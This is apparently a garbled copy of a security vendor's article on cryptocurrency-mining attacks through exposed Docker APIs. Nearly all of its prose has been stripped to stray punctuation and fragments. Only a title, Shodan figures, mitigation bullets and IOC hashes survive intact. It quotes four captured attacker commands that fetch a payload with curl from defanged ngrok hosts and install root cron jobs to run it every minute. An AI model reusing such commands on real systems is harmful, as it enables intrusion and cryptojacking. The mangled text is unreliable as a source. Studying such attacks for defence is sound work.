How the open source Docker API and public community images are used to distribute cryptocurrency miners



, -honeypots — . , Docker Hub. , - .



.



honeypots, , , , - . , Docker , . honeypots , , , .



, , Docker. , — , .



Docker API , , , , ( ) .





— . — , .





3762 Docker API. Shodan 12.02.2019





honeypots. Shodan , Docker API (. ) , , Monero. (2018, . ) 856 API.



honeypots , ngrok, ( localhost). URL` . , ngrok:



Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp9bedce/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c \"cron || crond\"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \"hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp570547/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c \"cron || crond\"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \"hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp326c80/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c \"cron || crond\"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \"hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\";echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp8b9b5b/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c \"cron || crond\"",
Entrypoint: "/bin/sh"


, URL. URL , .



. — ELF Linux ( Coinminer.SH.MALXMR.ATNO), . — (TrojanSpy.SH.ZNETMAP.A), , .



- , . HOST URL, , RIP — ( ) . HOST . , .





HOST RIP, , ,



, nginx. , Linux. .



. URL . zmap, . , ( ).



, . — Docker — .



— . , , : Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 Apache CouchDB. — , . . URL, .



Docker, .





— , — zmap





— , — , Docker





, alpine-curl 10



Alpine Linux curl, CLI , Docker. , 10 . , , . Docker — , . ( ), . , .



, (alpine-curl) , — . Docker . Docker .





, DevOps, . - , , , . , , , .



, , , :



  • : API, .
  • : , , ( ) .
  • , Docker .
  • , (, ). , .


Trendmicro DevOps , . Trend Micro Hybrid Cloud Security , DevOps XGen , . Deep Security Deep Security Smart Check, Docker .





:



  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)





